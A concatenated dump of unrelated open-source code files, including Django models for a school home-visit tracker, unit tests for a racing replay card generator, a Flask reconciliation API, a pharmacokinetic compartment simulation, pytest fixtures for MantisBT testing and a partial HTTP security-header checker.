#@utils.arg('-r', '--resource', metavar='<RESOURCE_ID>',
# help='ID of the resource to show the details for.')
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource for.')
#def do_resource(hc, args):
# '''Describe the resource'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resources for.')
#def do_resource_list(hc, args):
# '''Show list of resources belonging to a stack'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource details for.')
#def do_resource_list_details(hc, args):
# '''Detailed view of resources belonging to a stack'''
# pass
| apache-2.0 | 647,137,651,970,098,300 | 34.540284 | 79 | 0.604881 | false |
koebbe/homeworks | visit/models.py | 1 | 5342 | import datetime
from django.db import models
from django.contrib.auth.models import User
import json
import uuid
from qa import models as qamodels
PROGRAM_MODEL_CHOICES = (
('school_wide', '2+2'),
('fellowship', 'Fellowship Model'),
('ptlt', 'PTLT'),
)
class District(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class School(models.Model):
name = models.CharField(max_length=255)
district = models.ForeignKey(District, related_name='schools', blank=True, null=True)
program_model = models.CharField(max_length=20, choices=PROGRAM_MODEL_CHOICES)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class StaffStatus(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
verbose_name_plural = "Staff Statuses"
class ProgramDirector(models.Model):
#user = models.OneToOneField(User, null=True, blank=True)
staff = models.OneToOneField('Staff', null=True, blank=True)
schools = models.ManyToManyField(School, blank=True, related_name='programdirectors')
receive_emails = models.BooleanField(default=True)
class Meta:
ordering = ('staff', )
class SiteCoordinator(models.Model):
staff = models.OneToOneField('Staff', null=True, blank=True)
school = models.ForeignKey(School, blank=True, related_name='sitecoordinators')
class Meta:
ordering = ('staff', )
class Staff(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField(blank=True, null=True,)
school = models.ForeignKey(School, related_name='staff')
secondary_schools = models.ManyToManyField(School, blank=True, related_name='secondary_staff')
position = models.CharField(max_length=255, blank=True)
grade = models.CharField(max_length=255, blank=True)
#status = models.ForeignKey(StaffStatus, related_name='staff')
user = models.OneToOneField(User, null=True, blank=True)
is_visit_1_trained = models.BooleanField(default=False)
is_visit_2_trained = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
def all_visits(self):
return Visit.objects.filter(models.Q(staff1=self) | models.Q(staff2=self)) # | models.Q(staff3=self))
@property
def name(self):
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name')
verbose_name_plural = "Staff"
class Student(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
student_id = models.CharField(max_length=255)
school = models.ForeignKey(School, related_name='students')
gender = models.CharField(max_length=255, blank=True)
racial_identity = models.CharField(max_length=255, blank=True, null=True)
classroom_teachers = models.ManyToManyField(Staff, related_name='students')
grade = models.IntegerField(null=True, blank=True)
manually_added = models.BooleanField(default=False)
is_verified = models.BooleanField(default=False)
is_custom = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
@property
def name(self):
if not self.first_name and not self.last_name:
return "Student ID: %s" % (self.student_id)
else:
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name', 'student_id', 'school')
unique_together = ('student_id', 'school')
class Visit(models.Model):
VISIT_TYPES = (
('noshow', 'No-show'),
('complete', 'Complete'),
('contact_attempt', 'Contact Attempt')
)
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
staff1 = models.ForeignKey(Staff, related_name='visits_as_primary')
student = models.ForeignKey(Student, blank=True, null=True, related_name='visits',)
type = models.CharField(max_length=255, choices=VISIT_TYPES)
created = models.DateTimeField(auto_now_add=True)
staff2 = models.ForeignKey(Staff, related_name='vists_as_secondary', blank=True, null=True)
date_submitted = models.DateField(blank=True, null=True)
is_submitted = models.NullBooleanField(default=False, blank=True, null=True)
answerset = models.OneToOneField(qamodels.AnswerSet)
@property
def school(self):
return self.student.school
@property
def district(self):
return self.student.school.district
def __unicode__(self):
if not self.student:
return "Unfinished visit #%d" % (self.id)
return u"%s: %s" % (self.created, self.student.name)
class Meta:
ordering = ('staff1', 'created', )
| mit | 2,329,072,173,996,672,500 | 34.852349 | 109 | 0.670348 | false |
SenorPez/project-cars-replay-enhancer | test/test_DefaultCards.py | 1 | 20152 | """
Tests DefaultCards.py
"""
import unittest
from unittest.mock import MagicMock, PropertyMock, patch, sentinel
import numpy
from PIL import ImageFont
from replayenhancer.DefaultCards \
import RaceResults, SeriesStandings, StartingGrid, SeriesChampion
class TestRaceResults(unittest.TestCase):
"""
Unit tests for Race Results card.
"""
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_no_config(self, mock_classification_entry, mock_driver):
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry])
expected_result = RaceResults
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_config(self, mock_classification_entry, mock_driver):
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'DarkNitro',
}
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry], **configuration)
expected_result = RaceResults
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_points_best_lap(self, mock_classification_entry,
mock_driver):
driver_name = 'Kobernulf_Monnur'
position = 1
best_lap = 42.0
configuration = {
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry], **configuration)
expected_result = '20'
self.assertEqual(
instance.calc_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_points_not_best_lap(self, mock_classification_entry,
mock_driver):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 56.0
configuration = {
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
type(mock_classification_entry).best_lap = PropertyMock(
return_value=42.0)
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry], **configuration)
expected_result = '15'
self.assertEqual(
instance.calc_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.RaceData.Driver', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_points_no_point_structure(
self, mock_classification_entry, mock_driver):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_driver.laps_complete = 6
mock_driver.race_time = 42.00
mock_driver.stops = 0
mock_classification_entry.driver = mock_driver
instance = RaceResults([mock_classification_entry])
expected_result = '0'
self.assertEqual(
instance.calc_points((driver_name, position, best_lap)),
expected_result)
def test_method_format_time_below_min(self):
time = 42
expected_result = '42.000'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_min_truncate(self):
time = 42.1234
expected_result = '42.123'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_min_round(self):
time = 42.9876
expected_result = '42.988'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_hour(self):
time = 84
expected_result = '1:24.000'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_hour_truncate(self):
time = 84.1234
expected_result = '1:24.123'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_below_hour_round(self):
time = 84.9876
expected_result = '1:24.988'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time(self):
time = 3702
expected_result = '1:01:42.000'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_truncate(self):
time = 3702.1234
expected_result = '1:01:42.123'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_round(self):
time = 3702.9876
expected_result = '1:01:42.988'
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_passed_none(self):
time = None
expected_result = ""
self.assertEqual(RaceResults.format_time(time), expected_result)
def test_method_format_time_passed_string(self):
time = "ERROR"
expected_result = ""
self.assertEqual(RaceResults.format_time(time), expected_result)
class TestStartingGrid(unittest.TestCase):
"""
Unit tests for Starting Grid card.
"""
@patch('replayenhancer.RaceData.StartingGridEntry', autospec=True)
def test_init_no_config(self, mock_starting_grid_entry):
instance = StartingGrid(mock_starting_grid_entry)
expected_result = StartingGrid
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.RaceData.StartingGridEntry', autospec=True)
def test_init_config(self, mock_starting_grid_entry):
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'DarkNitro',
'points': 0
}
}
}
instance = StartingGrid([mock_starting_grid_entry], **configuration)
expected_result = StartingGrid
self.assertIsInstance(instance, expected_result)
class TestSeriesStandings(unittest.TestCase):
"""
Unit Tests for Series Standings card.
"""
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_no_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
instance = SeriesStandings(mock_classification_entry)
expected_result = SeriesStandings
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'Dark Nitro',
'points': 15
}
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry], **configuration)
expected_result = SeriesStandings
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_series_points(self, mock_classification_entry, mock_sort_data):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_sort_data.return_value = (driver_name, position, best_lap)
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
configuration = {
'points_lookup': {
'Kobernulf Monnur': 15
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry])
expected_result = '35'
self.assertEqual(
instance.calc_series_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_series_points_no_entry(self, mock_classification_entry, mock_sort_data):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_sort_data.return_value = (driver_name, position, best_lap)
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
configuration = {
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry])
expected_result = '20'
self.assertEqual(
instance.calc_series_points(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_calc_series_rank_first(self, mock_classification_entry, mock_sort_data):
driver_name = 'Kobernulf Monnur'
position = 1
best_lap = 42.0
mock_sort_data.return_value = (driver_name, position, best_lap)
type(mock_classification_entry).best_lap = PropertyMock(
return_value=best_lap)
type(mock_classification_entry).calc_points_data = PropertyMock(
return_value=(driver_name, position, best_lap))
type(mock_classification_entry).driver_name = PropertyMock(
return_value=driver_name)
configuration = {
'points_lookup': {
'Kobernulf Monnur': 15
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesStandings([mock_classification_entry])
expected_result = '1'
self.assertEqual(
instance.calc_series_rank(
(driver_name, position, best_lap),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry')
def test_method_calc_series_rank_tie_second(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = [
('First Place', 1, 42.0),
('Second Place', 2, 42.0),
('Third Place', 3, 42.0)
]
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('First Place', 1, 42.0),
driver_name='First Place')
first_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Second Place', 2, 42.0),
driver_name='Second Place')
second_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Third Place', 3, 42.0),
driver_name='Third Place')
third_place = patcher.start()
configuration = {
'points_lookup': {
'First Place': 10,
'Second Place': 5,
'Third Place': 5
},
'point_structure': [0, 10, 6, 6]
}
instance = SeriesStandings([first_place, second_place, third_place])
expected_result = '2'
self.assertEqual(
instance.calc_series_rank(
('Third Place', 3, 42.0),
**configuration),
expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry')
def test_method_calc_series_rank_third(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = [
('First Place', 1, 42.0),
('Second Place', 2, 42.0),
('Third Place', 3, 42.0)
]
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('First Place', 1, 42.0),
driver_name='First Place')
first_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Second Place', 2, 42.0),
driver_name='Second Place')
second_place = patcher.start()
patcher = patch(
'replayenhancer.RaceData.ClassificationEntry',
best_lap=42.0,
calc_points_data=('Third Place', 3, 42.0),
driver_name='Third Place')
third_place = patcher.start()
configuration = {
'points_lookup': {
'First Place': 10,
'Second Place': 10,
'Third Place': 5
},
'point_structure': [0, 10, 10, 6]
}
instance = SeriesStandings([first_place, second_place, third_place])
expected_result = '3'
self.assertEqual(
instance.calc_series_rank(
('Third Place', 3, 42.0),
**configuration),
expected_result)
class TestSeriesChampion(unittest.TestCase):
"""
Unit tests for Series Champion card.
"""
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_no_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
instance = SeriesChampion([mock_classification_entry])
expected_result = SeriesChampion
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_init_config(self, mock_classification_entry, mock_sort_data):
mock_sort_data.return_value = ('Kobernulf Monnur', 1, 42.0)
configuration = {
'participant_config': {
'Kobernulf Monnur': {
'display': 'Senor Pez',
'car': '125cc Shifter Kart',
'team': 'Dark Nitro',
'points': 15
}
},
'point_structure': [5, 15, 12, 10, 8, 6, 4, 2, 1]
}
instance = SeriesChampion([mock_classification_entry], **configuration)
expected_result = SeriesChampion
self.assertIsInstance(instance, expected_result)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_to_frame_no_header(self, mock_classification_entry, mock_sort_data):
first_place = mock_classification_entry
type(first_place).calc_points_data = PropertyMock(return_value=(
'Kobernulf Monnur',
1,
42.0))
type(first_place).driver_name = PropertyMock(return_value=(
'Kobernulf Monnur'))
second_place = mock_classification_entry
type(second_place).calc_points_data = PropertyMock(
return_value=(
'Second Place',
2,
43.0))
type(second_place).driver_name = PropertyMock(return_value=(
'Second Place'))
third_place = mock_classification_entry
type(third_place).calc_points_data = PropertyMock(return_value=(
'Third Place',
3,
43.5))
type(third_place).driver_name = PropertyMock(return_value=(
'Third Place'))
mock_sort_data.return_value = [
('Kobernulf Monnur', 1, 42.0),
('Second Place', 2, 43.0),
('Third Place', 3, 43.5)]
expected_value = numpy.ndarray
instance = SeriesChampion([first_place, second_place, third_place])
self.assertIsInstance(instance.to_frame(), expected_value)
@patch('replayenhancer.StaticBase.StaticBase._sort_data', autospec=True)
@patch('replayenhancer.RaceData.ClassificationEntry', autospec=True)
def test_method_to_frame_blank_header(self, mock_classification_entry, mock_sort_data):
first_place = mock_classification_entry
type(first_place).calc_points_data = PropertyMock(return_value=(
'Kobernulf Monnur',
1,
42.0))
type(first_place).driver_name = PropertyMock(return_value=(
'Kobernulf Monnur'))
second_place = mock_classification_entry
type(second_place).calc_points_data = PropertyMock(
return_value=(
'Second Place',
2,
43.0))
type(second_place).driver_name = PropertyMock(return_value=(
'Second Place'))
third_place = mock_classification_entry
type(third_place).calc_points_data = PropertyMock(return_value=(
'Third Place',
3,
43.5))
type(third_place).driver_name = PropertyMock(return_value=(
'Third Place'))
mock_sort_data.return_value = [
('Kobernulf Monnur', 1, 42.0),
('Second Place', 2, 43.0),
('Third Place', 3, 43.5)]
configuration = {
'heading_color': (255, 0, 0)}
expected_value = numpy.ndarray
instance = SeriesChampion([first_place, second_place, third_place], **configuration)
self.assertIsInstance(instance.to_frame(), expected_value) | mit | -6,962,500,503,765,455,000 | 36.242884 | 97 | 0.581878 | false |
robbi5/nomenklatura | nomenklatura/views/reconcile.py | 1 | 3887 | import json
from flask import Blueprint, request, url_for
from apikit import jsonify, get_limit, get_offset
from werkzeug.exceptions import BadRequest
from nomenklatura.model import Dataset, Entity
from nomenklatura.model.matching import find_matches
section = Blueprint('reconcile', __name__)
def reconcile_index(dataset):
domain = url_for('index', _external=True).strip('/')
urlp = domain + '/entities/{{id}}'
meta = {
'name': 'nomenklatura: %s' % dataset.label,
'identifierSpace': 'http://rdf.freebase.com/ns/type.object.id',
'schemaSpace': 'http://rdf.freebase.com/ns/type.object.id',
'view': {'url': urlp},
'preview': {
'url': urlp + '?preview=true',
'width': 600,
'height': 300
},
'suggest': {
'entity': {
'service_url': domain,
'service_path': '/api/2/datasets/' + dataset.name + '/suggest'
}
},
'defaultTypes': [{'name': dataset.label, 'id': '/' + dataset.name}]
}
return jsonify(meta)
def reconcile_op(dataset, query):
try:
limit = max(1, min(100, int(query.get('limit'))))
except:
limit = 5
matches = find_matches(dataset, query.get('query', ''))
matches = matches.limit(limit)
results = []
for match in matches:
results.append({
'name': match['entity'].name,
'score': match['score'],
'type': [{
'id': '/' + dataset.name,
'name': dataset.label
}],
'id': match['entity'].id,
'uri': url_for('entities.view', id=match['entity'].id, _external=True),
'match': match['score']==100
})
return {
'result': results,
'num': len(results)
}
@section.route('/datasets/<dataset>/reconcile', methods=['GET', 'POST'])
def reconcile(dataset):
"""
Reconciliation API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/ReconciliationServiceApi
"""
dataset = Dataset.by_name(dataset)
# TODO: Add proper support for types and namespacing.
data = request.args.copy()
data.update(request.form.copy())
if 'query' in data:
# single
q = data.get('query')
if q.startswith('{'):
try:
q = json.loads(q)
except ValueError:
raise BadRequest()
else:
q = data
return jsonify(reconcile_op(dataset, q))
elif 'queries' in data:
# multiple requests in one query
qs = data.get('queries')
try:
qs = json.loads(qs)
except ValueError:
raise BadRequest()
queries = {}
for k, q in qs.items():
queries[k] = reconcile_op(dataset, q)
return jsonify(queries)
else:
return reconcile_index(dataset)
@section.route('/datasets/<dataset>/suggest', methods=['GET', 'POST'])
def suggest(dataset):
"""
Suggest API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/SuggestApi
"""
dataset = Dataset.by_name(dataset)
entities = Entity.all().filter(Entity.invalid != True) # noqa
query = request.args.get('prefix', '').strip()
entities = entities.filter(Entity.name.ilike('%s%%' % query))
entities = entities.offset(get_offset(field='start'))
entities = entities.limit(get_limit(default=20))
matches = []
for entity in entities:
matches.append({
'name': entity.name,
'n:type': {
'id': '/' + dataset.name,
'name': dataset.label
},
'id': entity.id
})
return jsonify({
"code": "/api/status/ok",
"status": "200 OK",
"prefix": query,
"result": matches
})
| mit | -4,379,057,662,769,576,400 | 28.671756 | 83 | 0.545408 | false |
james-nichols/dtrw | compartment_models/PBPK_test.py | 1 | 5547 | #!/usr/local/bin/python3
# Libraries are in parent directory
import sys
sys.path.append('../')
import math
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import pdb
from dtrw import *
class DTRW_PBPK(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + g_N
return creation
"""return np.array([(1. - np.exp(-self.dT * self.Qs[0] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[1] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[2] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[3] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[4] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[0] / (self.Vs[0] * self.Rs[0]))) * self.Xs[0,n] + \
(1. - np.exp(-self.dT * self.Qs[1] / (self.Vs[1] * self.Rs[1]))) * self.Xs[1,n] + \
(1. - np.exp(-self.dT * self.Qs[2] / (self.Vs[2] * self.Rs[2]))) * self.Xs[2,n] + \
(1. - np.exp(-self.dT * self.Qs[3] / (self.Vs[3] * self.Rs[3]))) * self.Xs[3,n] + \
(1. - np.exp(-self.dT * self.Qs[4] / (self.Vs[4] * self.Rs[4]))) * self.Xs[4,n] + \
g_N ])"""
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
return rates
class DTRW_PBPK_anom(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T, alpha):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK_anom, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
self.alpha = alpha
self.Ks[2] = calc_sibuya_kernel(self.N+1, self.alpha)
self.Ks[5] = calc_sibuya_kernel(self.N+1, self.alpha)
self.anom_rates = [None] * self.n_species
self.anom_rates[2] = self.Qs[2] / (self.Vs[2] * self.Rs[2])
self.anom_rates[5] = self.Qs[2] / (self.Vs[-1])
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[2] = self.removal_flux_anomalous(n)[5]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + self.removal_flux_anomalous(n)[2] + g_N
return creation
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[2,0] = 0.
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
rates[5,2] = 0.
return rates
T = 100.0
dT = 0.01
ts = np.arange(0., T, dT)
initial = [0., 0., 0., 0., 0., 0.]
mu = 0.5 # Kidney removal rate
V_max = 2.69
K_m = 0.59
# [P, R, F, K, L, A]
Vs = [28.6, 6.90, 15.10, 0.267, 1.508, 1.570]
Qs = [1.46, 1.43, 0.29, 1.14, 1.52]
Rs = [0.69, 0.79, 0.39, 0.80, 0.78]
alpha = 0.8
g = 1.0
g_T = 1.0
dtrw = DTRW_PBPK(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T)
dtrw_anom = DTRW_PBPK_anom(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T, alpha)
dtrw.solve_all_steps()
dtrw_anom.solve_all_steps()
max_level = max([dtrw.Xs[0,:].max(), dtrw.Xs[1,:].max(), dtrw.Xs[2,:].max(), dtrw.Xs[3,:].max(), dtrw.Xs[4,:].max(), dtrw.Xs[5,:].max()])
fig = plt.figure(figsize=(8,8))
plt.xlim(0,T)
plt.ylim(0,1.1 * max_level)
plt.xlabel('Time')
P, = plt.plot(ts, dtrw.Xs[0,:])
R, = plt.plot(ts, dtrw.Xs[1,:])
F, = plt.plot(ts, dtrw.Xs[2,:])
K, = plt.plot(ts, dtrw.Xs[3,:])
L, = plt.plot(ts, dtrw.Xs[4,:])
A, = plt.plot(ts, dtrw.Xs[5,:])
plt.legend([P, R, F, K, L, A], ["Poorly perfused", "Richly perfused", "Fatty tissue", "Kidneys", "Liver", "Arterial blood"])
Pa, = plt.plot(ts, dtrw_anom.Xs[0,:],'b:')
Ra, = plt.plot(ts, dtrw_anom.Xs[1,:],'g:')
Fa, = plt.plot(ts, dtrw_anom.Xs[2,:],'r:')
Ka, = plt.plot(ts, dtrw_anom.Xs[3,:],'c:')
La, = plt.plot(ts, dtrw_anom.Xs[4,:],'m:')
Aa, = plt.plot(ts, dtrw_anom.Xs[5,:],'y:')
plt.show()
T, = plt.plot(ts, dtrw.Xs.sum(0), 'k')
Ta, = plt.plot(ts, dtrw_anom.Xs.sum(0), 'k:')
plt.show()
| gpl-2.0 | 154,471,276,779,151,000 | 31.822485 | 137 | 0.491437 | false |
AndreyBalabanov/python_training_mantisBT | conftest.py | 1 | 2344 |
import pytest
import json
import os.path
from fixture.application import Application
import ftputil
from fixture.soap import SoapHelper
fixture = None
target = None
def load_config(file):
global target
if target is None:
config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), file)
with open(config_file) as f:
target = json.load(f)
return target
@pytest.fixture(scope="session")
def config(request):
return load_config(request.config.getoption("--target"))
@pytest.fixture
def app(request, config):
global fixture
browser = request.config.getoption("--browser")
if fixture is None or not fixture.is_valid():
fixture = Application(browser=browser, config=config)
fixture.session.login("administrator", "root")
return fixture
@pytest.fixture(scope="session", autouse=True)
def configure_server(request, config):
install_server_configuration(config['ftp']['host'], config['ftp']['username'], config['ftp']['password'])
def fin():
restore_server_configuration(config['ftp']['host'], config['ftp']['username'], config['ftp']['password'])
request.addfinalizer(fin)
def install_server_configuration(host, username, password):
with ftputil.FTPHost(host, username, password) as remote:
if remote.path.isfile("config_inc.php.bak"):
remote.remove("config_inc.php.bak")
if remote.path.isfile("config_inc.php"):
remote.rename("config_inc.php", "config_inc.php.bak")
remote.upload(os.path.join(os.path.dirname(__file__), "resources/config_inc.php"), "config_inc.php")
def restore_server_configuration(host, username, password):
with ftputil.FTPHost(host, username, password) as remote:
if remote.path.isfile("config_inc.php.bak"):
if remote.path.isfile("config_inc.php"):
remote.remove("config_inc.php")
remote.rename("config_inc.php.bak", "config_inc.php")
@pytest.fixture(scope="session", autouse=True)
def stop(request):
def fin():
fixture.session.ensure_logout()
fixture.destroy()
request.addfinalizer(fin)
return fixture
def pytest_addoption(parser):
parser.addoption("--browser", action="store", default="firefox")
parser.addoption("--target", action="store", default="target.json") | apache-2.0 | -5,682,501,227,056,088,000 | 31.569444 | 113 | 0.676195 | false |
secopsconsult/websitechecks | securityheaders.py | 1 | 2724 | #!/usr/bin/env python
'''
Script to check for the presence of Security headers and rate the site
More info:
https://securityheaders.io/
'''
import optparse
import mechanize
import tkinter
def validateHeaders(header, debug):
if (debug):
print "[+] Validating headers"
print "[~] Headers: " + str(header)
if (debug):
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: Header not Empty"
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: " + str(header.getheaders('Public-Key-Pins')[0])
else:
print "[~] No HPKP Header present"
if (debug):
if (len(header.getheaders('Content-Security-Policy')) > 0):
